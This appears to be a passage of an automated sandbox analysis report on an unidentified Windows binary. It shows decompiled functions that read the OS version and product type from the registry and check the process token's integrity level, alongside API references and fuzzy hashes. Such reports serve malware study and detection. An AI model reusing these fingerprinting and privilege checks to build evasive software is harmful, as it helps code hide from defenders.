                                                                                                0x00f76a45
                                                                                                0x00f76a48
                                                                                                0x00f76a51
                                                                                                0x00f76a54
                                                                                                0x00f76a5a
                                                                                                0x00f76a5a
                                                                                                0x00f76a64
                                                                                                0x00f76a83

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,?,?,?,?,?,?,00000000,00FB5F18,000000FF), ref: 00F765BC
                                                                                                • RegQueryValueExW.KERNELBASE(?,ProductType,00000000,00000000,?,?,?,?,?,?,?,00000000,00FB5F18,000000FF), ref: 00F765EE
                                                                                                • RegQueryValueExW.KERNELBASE(?,ProductSuite,00000000,00000000,?,?,?,?,?,?,?,00000000,00FB5F18,000000FF), ref: 00F76697
                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,00000000,00FB5F18,000000FF), ref: 00F76A54
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$Small Business$Small Business(Restricted)$Storage Server$Terminal Server
                                                                                                • API String ID: 1586453840-555442329
                                                                                                • Opcode ID: 6bd343358ffb9a92a3fa6d3326af27100a95f00d31e1f9cd04076d3d77d81df5
                                                                                                • Instruction ID: e3da4c8a2941d30fa5c1fca93807a13e251266486d838abe93d96d3891f59fb8
                                                                                                • Opcode Fuzzy Hash: 6bd343358ffb9a92a3fa6d3326af27100a95f00d31e1f9cd04076d3d77d81df5
                                                                                                • Instruction Fuzzy Hash: 72E1D33190065B8ACB24AF14C501BB6F771FF403A4F59C25AEC4CEB589EB349A45FB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 97%
                                                                                                			E00F762E0(void* __ebx, void* __edi, void* __esi) {
                                                                                                				signed int _t65;
                                                                                                				char _t66;
                                                                                                				char _t71;
                                                                                                				void* _t72;
                                                                                                				long _t85;
                                                                                                				long _t88;
                                                                                                				long _t91;
                                                                                                				signed int* _t94;
                                                                                                				char* _t95;
                                                                                                				intOrPtr _t99;
                                                                                                				char* _t103;
                                                                                                				void* _t108;
                                                                                                				char* _t109;
                                                                                                				signed int _t114;
                                                                                                				signed int _t115;
                                                                                                				void* _t119;
                                                                                                				signed short _t122;
                                                                                                				char* _t123;
                                                                                                				void* _t124;
                                                                                                				void* _t126;
                                                                                                
                                                                                                				_t119 = __edi;
                                                                                                				_t108 = __ebx;
                                                                                                				_t123 = _t124 - 0x63c;
                                                                                                				_t126 = _t124 - 0x618;
                                                                                                				_t65 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t66 = _t65 ^ _t123;
                                                                                                				_t123[0x638] = _t66;
                                                                                                				 *[fs:0x0] = _t123 - 0xc;
                                                                                                				 *(_t123 - 0x14) = 0xfc75c4;
                                                                                                				 *(_t123 - 0x10) = 0;
                                                                                                				 *(_t123 - 4) = 0;
                                                                                                				_t109 = _t123 - 0x14;
                                                                                                				 *((intOrPtr*)( *(_t123 - 0x14) + 4))(_t66, __esi,  *[fs:0x0], 0xfb5ee8, 0xffffffff);
                                                                                                				_t71 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119, _t123 - 0x10); // executed
                                                                                                				if(_t71 != 0) {
                                                                                                					L18:
                                                                                                					 *(_t123 - 4) = 0xffffffff;
                                                                                                					_t72 =  *(_t123 - 0x10);
                                                                                                					 *(_t123 - 0x14) = 0xfc75c4;
                                                                                                					if(_t72 != 0) {
                                                                                                						RegCloseKey(_t72);
                                                                                                						 *(_t123 - 0x10) = 0;
                                                                                                					}
                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0xc));
                                                                                                					return E00F80D7F(_t123[0x638] ^ _t123, _t117);
                                                                                                				}
                                                                                                				_t122 = RegQueryValueExW;
                                                                                                				 *(_t123 - 0x1c) = _t71;
                                                                                                				 *(_t123 - 0x20) = _t71;
                                                                                                				 *(_t123 - 0x24) = 4;
                                                                                                				RegQueryValueExW( *(_t123 - 0x10), L"CurrentMajorVersionNumber", 0, 0, _t123 - 0x1c, _t123 - 0x24); // executed
                                                                                                				RegQueryValueExW( *(_t123 - 0x10), L"CurrentMinorVersionNumber", 0, 0, _t123 - 0x20, _t123 - 0x24); // executed
                                                                                                				if( *(_t123 - 0x1c) != 0) {
                                                                                                					L6:
                                                                                                					 *0xfd2570 =  *(_t123 - 0x1c);
                                                                                                					 *0xfd2574 =  *(_t123 - 0x20);
                                                                                                					 *(_t123 - 0x28) = 0x208;
                                                                                                					_t85 = RegQueryValueExW( *(_t123 - 0x10), L"CurrentBuildNumber", 0, 0,  &(_t123[0x208]), _t123 - 0x28); // executed
                                                                                                					if(_t85 == 0) {
                                                                                                						_push(_t109);
                                                                                                						_t117 = _t123 - 0x18;
                                                                                                						 *(_t123 - 0x18) = 0xffffffff;
                                                                                                						_t109 =  &(_t123[0x208]);
                                                                                                						_t99 = E00F76EE0(_t109, _t123 - 0x18);
                                                                                                						_t126 = _t126 + 4;
                                                                                                						 *0xfd2578 = _t99;
                                                                                                					}
                                                                                                					 *(_t123 - 0x2c) = 0x208;
                                                                                                					_t88 = RegQueryValueExW( *(_t123 - 0x10), L"ReleaseId", 0, 0, _t123, _t123 - 0x2c); // executed
                                                                                                					if(_t88 == 0) {
                                                                                                						_push(_t109);
                                                                                                						_t117 = _t123 - 0x18;
                                                                                                						 *(_t123 - 0x18) = 0xffffffff;
                                                                                                						 *0xfd2688 = E00F76EE0(_t123, _t123 - 0x18);
                                                                                                					}
                                                                                                					 *(_t123 - 0x30) = 0x208;
                                                                                                					_t91 = RegQueryValueExW( *(_t123 - 0x10), L"CSDVersion", 0, 0,  &(_t123[0x410]), _t123 - 0x30); // executed
                                                                                                					if(_t91 != 0) {
                                                                                                						L17:
                                                                                                						 *0xfd2685 = E00F76060();
                                                                                                						E00F76550(_t108, _t119, _t122);
                                                                                                						goto L18;
                                                                                                					} else {
                                                                                                						_t122 = _t123[0x410];
                                                                                                						_t94 = 0xfd2580;
                                                                                                						if(_t122 == 0) {
                                                                                                							L14:
                                                                                                							_t114 = 0;
                                                                                                							 *_t94 = 0;
                                                                                                							_t95 =  &(_t123[0x410]);
                                                                                                							if(_t122 == 0) {
                                                                                                								L16:
                                                                                                								 *0xfd257c = (_t123[0x40e + _t114 * 2] & 0x0000ffff) - 0x30;
                                                                                                								goto L17;
                                                                                                							} else {
                                                                                                								goto L15;
                                                                                                							}
                                                                                                							do {
                                                                                                								L15:
                                                                                                								_t95 =  &(_t95[2]);
                                                                                                								_t114 = _t114 + 1;
                                                                                                							} while ( *_t95 != 0);
                                                                                                							goto L16;
                                                                                                						}
                                                                                                						_t115 = _t122 & 0x0000ffff;
                                                                                                						_t117 =  &(_t123[0x410]) - 0xfd2580;
                                                                                                						do {
                                                                                                							 *_t94 = _t115;
                                                                                                							_t94 =  &(_t94[0]);
                                                                                                							_t115 =  *(_t94 + _t117) & 0x0000ffff;
                                                                                                						} while (_t115 != 0);
                                                                                                						goto L14;
                                                                                                					}
                                                                                                				}
                                                                                                				 *(_t123 - 0x18) = 0x20;
                                                                                                				RegQueryValueExW( *(_t123 - 0x10), L"CurrentVersion", 0, 0,  &(_t123[0x618]), _t123 - 0x18);
                                                                                                				_t117 = _t123[0x618];
                                                                                                				_t103 =  &(_t123[0x618]);
                                                                                                				_t109 = 0;
                                                                                                				if(_t117 == 0) {
                                                                                                					goto L6;
                                                                                                				} else {
                                                                                                					goto L3;
                                                                                                				}
                                                                                                				do {
                                                                                                					L3:
                                                                                                					_t103 =  &(_t103[2]);
                                                                                                					_t109 =  &(_t109[1]);
                                                                                                				} while ( *_t103 != 0);
                                                                                                				if(_t109 == 3) {
                                                                                                					 *(_t123 - 0x1c) = (_t117 & 0x0000ffff) - 0x30;
                                                                                                					 *(_t123 - 0x20) = (_t123[0x61c] & 0x0000ffff) - 0x30;
                                                                                                				}
                                                                                                				goto L6;
                                                                                                			}























                                                                                                0x00f762e0
                                                                                                0x00f762e0
                                                                                                0x00f762e1
                                                                                                0x00f762fc
                                                                                                0x00f762ff
                                                                                                0x00f76304
                                                                                                0x00f76306
                                                                                                0x00f76311
                                                                                                0x00f76317
                                                                                                0x00f7631e
                                                                                                0x00f76325
                                                                                                0x00f7632c
                                                                                                0x00f76332
                                                                                                0x00f7634a
                                                                                                0x00f76352
                                                                                                0x00f7650c
                                                                                                0x00f7650c
                                                                                                0x00f76513
                                                                                                0x00f76516
                                                                                                0x00f7651f
                                                                                                0x00f76522
                                                                                                0x00f76528
                                                                                                0x00f76528
                                                                                                0x00f76532
                                                                                                0x00f7654f
                                                                                                0x00f7654f
                                                                                                0x00f76358
                                                                                                0x00f7635e
                                                                                                0x00f76361
                                                                                                0x00f7636b
                                                                                                0x00f7637f
                                                                                                0x00f76395
                                                                                                0x00f7639b
                                                                                                0x00f763f6
                                                                                                0x00f763f9
                                                                                                0x00f76401
                                                                                                0x00f76410
                                                                                                0x00f76424
                                                                                                0x00f76428
                                                                                                0x00f7642a
                                                                                                0x00f7642b
                                                                                                0x00f7642e
                                                                                                0x00f76435
                                                                                                0x00f7643b
                                                                                                0x00f76440
                                                                                                0x00f76443
                                                                                                0x00f76443
                                                                                                0x00f7644b
                                                                                                0x00f76463
                                                                                                0x00f76467
                                                                                                0x00f76469
                                                                                                0x00f7646a
                                                                                                0x00f7646d
                                                                                                0x00f7647f
                                                                                                0x00f7647f
                                                                                                0x00f76487
                                                                                                0x00f764a2
                                                                                                0x00f764a6
                                                                                                0x00f764fd
                                                                                                0x00f76502
                                                                                                0x00f76507
                                                                                                0x00000000
                                                                                                0x00f764a8
                                                                                                0x00f764a8
                                                                                                0x00f764af
                                                                                                0x00f764b7
                                                                                                0x00f764d3
                                                                                                0x00f764d3
                                                                                                0x00f764d5
                                                                                                0x00f764d8
                                                                                                0x00f764e1
                                                                                                0x00f764ed
                                                                                                0x00f764f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f764e3
                                                                                                0x00f764e3
                                                                                                0x00f764e3
                                                                                                0x00f764e6
                                                                                                0x00f764e7
                                                                                                0x00000000
                                                                                                0x00f764e3
                                                                                                0x00f764bf
                                                                                                0x00f764c2
                                                                                                0x00f764c4
                                                                                                0x00f764c4
                                                                                                0x00f764c7
                                                                                                0x00f764ca
                                                                                                0x00f764ce
                                                                                                0x00000000
                                                                                                0x00f764c4
                                                                                                0x00f764a6
                                                                                                0x00f763a0
                                                                                                0x00f763bb
                                                                                                0x00f763bd
                                                                                                0x00f763c4
                                                                                                0x00f763ca
                                                                                                0x00f763cf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f763d1
                                                                                                0x00f763d1
                                                                                                0x00f763d1
                                                                                                0x00f763d4
                                                                                                0x00f763d5
                                                                                                0x00f763de
                                                                                                0x00f763e6
                                                                                                0x00f763f3
                                                                                                0x00f763f3
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,?,?,?,?,?,00000000,00FB5EE8,000000FF), ref: 00F7634A
                                                                                                • RegQueryValueExW.KERNELBASE(?,CurrentMajorVersionNumber,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00FB5EE8,000000FF), ref: 00F7637F
                                                                                                • RegQueryValueExW.KERNELBASE(?,CurrentMinorVersionNumber,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00FB5EE8,000000FF), ref: 00F76395
                                                                                                • RegQueryValueExW.ADVAPI32(?,CurrentVersion,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00FB5EE8,000000FF), ref: 00F763BB
                                                                                                • RegQueryValueExW.KERNELBASE(?,CurrentBuildNumber,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00FB5EE8,000000FF), ref: 00F76424
                                                                                                • RegQueryValueExW.KERNELBASE(?,ReleaseId,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00FB5EE8,000000FF), ref: 00F76463
                                                                                                • RegQueryValueExW.KERNELBASE(?,CSDVersion,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00FB5EE8,000000FF), ref: 00F764A2
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00FB5EE8,000000FF), ref: 00F76522
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                • String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion
                                                                                                • API String ID: 1586453840-1145933228
                                                                                                • Opcode ID: 35165fb4cc6ad257b5fab5552575a156b37668d5bdc98dc53b399c2c8039b564
                                                                                                • Instruction ID: f620176cc5e66fed84ff903fd164e0b72efcebec5bea207c00725b80e562618c
                                                                                                • Opcode Fuzzy Hash: 35165fb4cc6ad257b5fab5552575a156b37668d5bdc98dc53b399c2c8039b564
                                                                                                • Instruction Fuzzy Hash: 5C715DB1D4021E9EDB20DF64CD41FEEBBB8FB04710F00422AE915A7290E7749A44DFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00F75810() {
                                                                                                				long _v4;
                                                                                                				void _v8;
                                                                                                				void* _v12;
                                                                                                				void* _v16;
                                                                                                				int _t15;
                                                                                                				signed int _t20;
                                                                                                
                                                                                                				_v12 = 0;
                                                                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
                                                                                                					_v8 = 0;
                                                                                                					_v4 = 0;
                                                                                                					_t20 = 0; // executed
                                                                                                					_t15 = GetTokenInformation(_v12, 0x14,  &_v8, 4,  &_v4); // executed
                                                                                                					if(_t15 != 0) {
                                                                                                						_t20 = 0 | _v12 != 0x00000000;
                                                                                                					}
                                                                                                					CloseHandle(_v16);
                                                                                                					return _t20;
                                                                                                				} else {
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}









                                                                                                0x00f75816
                                                                                                0x00f7582f
                                                                                                0x00f7583c
                                                                                                0x00f7584b
                                                                                                0x00f7585a
                                                                                                0x00f7585c
                                                                                                0x00f75864
                                                                                                0x00f7586b
                                                                                                0x00f7586b
                                                                                                0x00f75872
                                                                                                0x00f7587e
                                                                                                0x00f75831
                                                                                                0x00f75836
                                                                                                0x00f75836

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 00F75820
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 00F75827
                                                                                                • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00F7585C
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00F75872
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                • String ID:
                                                                                                • API String ID: 215268677-0
                                                                                                • Opcode ID: 3afd2d64eeaf0f43be3b742ab03558a8b3f9b53910310fd2a0253df577b9e615
                                                                                                • Instruction ID: 7f8aef152a64697a85f6cc4cb614fde9abee2a1d7562e7c705dbc34bc6e33334
                                                                                                • Opcode Fuzzy Hash: 3afd2d64eeaf0f43be3b742ab03558a8b3f9b53910310fd2a0253df577b9e615
                                                                                                • Instruction Fuzzy Hash: B7F01274144305ABE710AF20EC45B5A7BECFB84790F448919F984C21A0D779951DEE63
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 87%
                                                                                                			E00F75C70(void** __ecx, void* __edx) {
                                                                                                				void* _v8;
                                                                                                				char _v16;
                                                                                                				long _v20;
                                                                                                				union _TOKEN_INFORMATION_CLASS _v24;
                                                                                                				void* _v28;
                                                                                                				void** _v32;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				signed int _t24;
                                                                                                				int _t28;
                                                                                                				void* _t36;
                                                                                                				void* _t40;
                                                                                                				void* _t46;
                                                                                                				void* _t49;
                                                                                                				long _t52;
                                                                                                				void* _t53;
                                                                                                				void** _t55;
                                                                                                				signed int _t57;
                                                                                                
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb5d79);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t24 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t24 ^ _t57);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				_v28 = __edx;
                                                                                                				_t55 = __ecx;
                                                                                                				_v32 = __ecx;
                                                                                                				_v8 = 0;
                                                                                                				_v24 = 0;
                                                                                                				 *__ecx = 0;
                                                                                                				__ecx[1] = 0;
                                                                                                				__ecx[2] = 0;
                                                                                                				_v8 = 0;
                                                                                                				_v24 = 1;
                                                                                                				_v20 = 0;
                                                                                                				_t28 = GetTokenInformation(__edx, 1, 0, 0,  &_v20); // executed
                                                                                                				if(_t28 == 0 && GetLastError() == 0x7a) {
                                                                                                					_t40 = _t55[1];
                                                                                                					_t49 =  *_t55;
                                                                                                					_t46 = _t40 - _t49;
                                                                                                					_t52 = _v20;
                                                                                                					if(_t52 >= _t46) {
                                                                                                						if(__eflags > 0) {
                                                                                                							__eflags = _t52 - _t55[2] - _t49;
                                                                                                							if(_t52 <= _t55[2] - _t49) {
                                                                                                								_t53 = _t52 - _t46;
                                                                                                								__eflags = _t53;
                                                                                                								E00F95A00(_t53, _t40, 0, _t53);
                                                                                                								_t36 = _t53 + _t40;
                                                                                                								_t52 = _v20;
                                                                                                								goto L8;
                                                                                                							} else {
                                                                                                								E00F75F00(_t40, _t55, _t52, _t52, _t46);
                                                                                                								_t52 = _v20;
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t36 = _t49 + _t52;
                                                                                                						L8:
                                                                                                						_t55[1] = _t36;
                                                                                                					}
                                                                                                					GetTokenInformation(_v28, 1,  *_t55, _t52,  &_v20); // executed
                                                                                                				}
                                                                                                				 *[fs:0x0] = _v16;
                                                                                                				return _t55;
                                                                                                			}





















                                                                                                0x00f75c73
                                                                                                0x00f75c75
                                                                                                0x00f75c80
                                                                                                0x00f75c87
                                                                                                0x00f75c8e
                                                                                                0x00f75c92
                                                                                                0x00f75c9a
                                                                                                0x00f75c9d
                                                                                                0x00f75c9f
                                                                                                0x00f75ca2
                                                                                                0x00f75ca9
                                                                                                0x00f75cb0
                                                                                                0x00f75cb6
                                                                                                0x00f75cbd
                                                                                                0x00f75cc4
                                                                                                0x00f75cd6
                                                                                                0x00f75cdd
                                                                                                0x00f75ce4
                                                                                                0x00f75cec
                                                                                                0x00f75cf9
                                                                                                0x00f75cfe
                                                                                                0x00f75d00
                                                                                                0x00f75d02
                                                                                                0x00f75d07
                                                                                                0x00f75d0e
                                                                                                0x00f75d15
                                                                                                0x00f75d17
                                                                                                0x00f75d27
                                                                                                0x00f75d27
                                                                                                0x00f75d2d
                                                                                                0x00f75d32
                                                                                                0x00f75d38
                                                                                                0x00000000
                                                                                                0x00f75d19
                                                                                                0x00f75d1d
                                                                                                0x00f75d22
                                                                                                0x00f75d22
                                                                                                0x00f75d17
                                                                                                0x00f75d09
                                                                                                0x00f75d09
                                                                                                0x00f75d3b
                                                                                                0x00f75d3b
                                                                                                0x00f75d3b
                                                                                                0x00f75d4a
                                                                                                0x00f75d4a
                                                                                                0x00f75d55
                                                                                                0x00f75d63

                                                                                                APIs
                                                                                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00F75C48,FD8FA683), ref: 00F75CE4
                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00F75C48,FD8FA683), ref: 00F75CEE
                                                                                                • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00F75C48,FD8FA683), ref: 00F75D4A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InformationToken$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 2567405617-0
                                                                                                • Opcode ID: a2d3117b15f8e665140c6bb707ea867fd853a0b630229da1771f6535f6a3b5ba
                                                                                                • Instruction ID: 5510d57bd67478232d091ca67743037e0905da8fa71a0d21689147f0c07905b8
                                                                                                • Opcode Fuzzy Hash: a2d3117b15f8e665140c6bb707ea867fd853a0b630229da1771f6535f6a3b5ba
                                                                                                • Instruction Fuzzy Hash: 6D31A071A04609DFDB24DF59CC49BAFFBB9FB44B10F10892EE419A3280D7B5A9049B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FA5F94,00000001,00000364,00000006,000000FF,?,00000000,?,00F98D33,00000000,?,00F98DAB), ref: 00FA909D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 92e0bfc6f0cdf4dfa443621354d2245c478b795edc5ceddbc8ef63638a153ad9
                                                                                                • Instruction ID: b6d31ed0f6a727452e886854d7208520cb14c079edbb0d606952a03b3530e79b
                                                                                                • Opcode Fuzzy Hash: 92e0bfc6f0cdf4dfa443621354d2245c478b795edc5ceddbc8ef63638a153ad9
                                                                                                • Instruction Fuzzy Hash: E4F0B476A085346BAB316B369C05B9A3759AF837F0B14C131A815D6190CAA0D801B6E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                C-Code - Quality: 74%
                                                                                                			E00F75360(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                				void* __ebx;
                                                                                                				signed int _t108;
                                                                                                				short _t109;
                                                                                                				int _t127;
                                                                                                				void* _t135;
                                                                                                				intOrPtr _t146;
                                                                                                				_Unknown_base(*)()* _t162;
                                                                                                				void* _t168;
                                                                                                				intOrPtr _t172;
                                                                                                				int _t174;
                                                                                                				signed int _t177;
                                                                                                				signed int _t179;
                                                                                                				void* _t184;
                                                                                                				struct HWND__* _t186;
                                                                                                				signed int _t187;
                                                                                                				signed int _t197;
                                                                                                				signed int _t203;
                                                                                                				signed int _t204;
                                                                                                				signed int _t206;
                                                                                                				signed int _t209;
                                                                                                				void* _t213;
                                                                                                				void* _t222;
                                                                                                				struct HWND__* _t232;
                                                                                                				void* _t236;
                                                                                                				signed int _t246;
                                                                                                				signed int _t247;
                                                                                                				intOrPtr* _t248;
                                                                                                				void* _t252;
                                                                                                				intOrPtr* _t254;
                                                                                                				intOrPtr* _t257;
                                                                                                				intOrPtr* _t259;
                                                                                                				intOrPtr* _t261;
                                                                                                				intOrPtr* _t270;
                                                                                                				void* _t271;
                                                                                                				intOrPtr _t272;
                                                                                                				intOrPtr _t274;
                                                                                                				signed int _t275;
                                                                                                				int _t276;
                                                                                                				void* _t278;
                                                                                                				intOrPtr _t279;
                                                                                                				short _t281;
                                                                                                				DWORD* _t282;
                                                                                                				void* _t284;
                                                                                                				void* _t285;
                                                                                                				WCHAR* _t287;
                                                                                                				void* _t289;
                                                                                                				void* _t292;
                                                                                                				HANDLE* _t293;
                                                                                                
                                                                                                				_t287 = _t289 - 0x20c;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb5c80);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t108 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t109 = _t108 ^ _t287;
                                                                                                				_t287[0x104] = _t109;
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_push(_t109);
                                                                                                				 *[fs:0x0] = _t287 - 0xc;
                                                                                                				 *((intOrPtr*)(_t287 - 0x1c)) = __edx;
                                                                                                				_t274 = __ecx;
                                                                                                				 *((intOrPtr*)(_t287 - 0x30)) = __ecx;
                                                                                                				_t202 = _t287[0x110];
                                                                                                				_t281 = _t287[0x112];
                                                                                                				 *(_t287 - 0x34) = _t287[0x10a];
                                                                                                				 *((char*)(_t287 - 0xd)) = _t287[0x10e];
                                                                                                				 *(_t287 - 0x24) = _t287[0x110];
                                                                                                				E00F76BD0(_t287 - 0x70, 0x3c, 0);
                                                                                                				_t292 = _t289 - 0x1a4 + 0xc;
                                                                                                				 *(_t287 - 0x70) = 0x3c;
                                                                                                				_t116 =  !=  ? 0x440 : 0x400;
                                                                                                				 *(_t287 - 0x6c) =  !=  ? 0x440 : 0x400;
                                                                                                				E00F75AA0(_t287[0x110], _t287 - 0x18, _t274, _t281, _t274);
                                                                                                				 *(_t287 - 4) = 0;
                                                                                                				_t213 = _t287 - 0x14;
                                                                                                				E00F75AA0(_t202, _t213, _t274, _t281,  *((intOrPtr*)(_t287 - 0x1c)));
                                                                                                				 *(_t287 - 4) = 1;
                                                                                                				_push(_t213);
                                                                                                				_t203 = E00F75990(_t202, _t274, _t274, _t281, _t287 - 0x2c);
                                                                                                				 *(_t287 - 4) = 2;
                                                                                                				_t252 =  *_t203;
                                                                                                				_t275 =  *(_t252 - 0xc);
                                                                                                				if(_t275 < 0) {
                                                                                                					L60:
                                                                                                					_push(0x80070057);
                                                                                                					E00F71CB0();
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					asm("int3");
                                                                                                					_t293 = _t292 - 0xc;
                                                                                                					 *_t293 = 0;
                                                                                                					if(OpenProcessToken(GetCurrentProcess(), 8, _t293) != 0) {
                                                                                                						_push(_t203);
                                                                                                						_t293[2] = 0;
                                                                                                						_t293[5] = 0;
                                                                                                						_t204 = 0; // executed
                                                                                                						_t127 = GetTokenInformation(_t293[5], 0x14,  &(_t293[4]), 4,  &(_t293[3])); // executed
                                                                                                						if(_t127 != 0) {
                                                                                                							_t204 = 0 | _t293[2] != 0x00000000;
                                                                                                						}
                                                                                                						CloseHandle(_t293[1]);
                                                                                                						return _t204;
                                                                                                					} else {
                                                                                                						return 0;
                                                                                                					}
                                                                                                				} else {
                                                                                                					if((0x00000001 -  *((intOrPtr*)(_t252 - 4)) |  *((intOrPtr*)(_t252 - 8)) - _t275) < 0) {
                                                                                                						E00F74120(_t203, _t252, _t275);
                                                                                                						_t252 =  *_t203;
                                                                                                					}
                                                                                                					E00F9954A(_t252, _t275 + 1);
                                                                                                					_t135 =  *_t203;
                                                                                                					_t292 = _t292 + 8;
                                                                                                					if(_t275 >  *((intOrPtr*)(_t135 - 8))) {
                                                                                                						goto L60;
                                                                                                					} else {
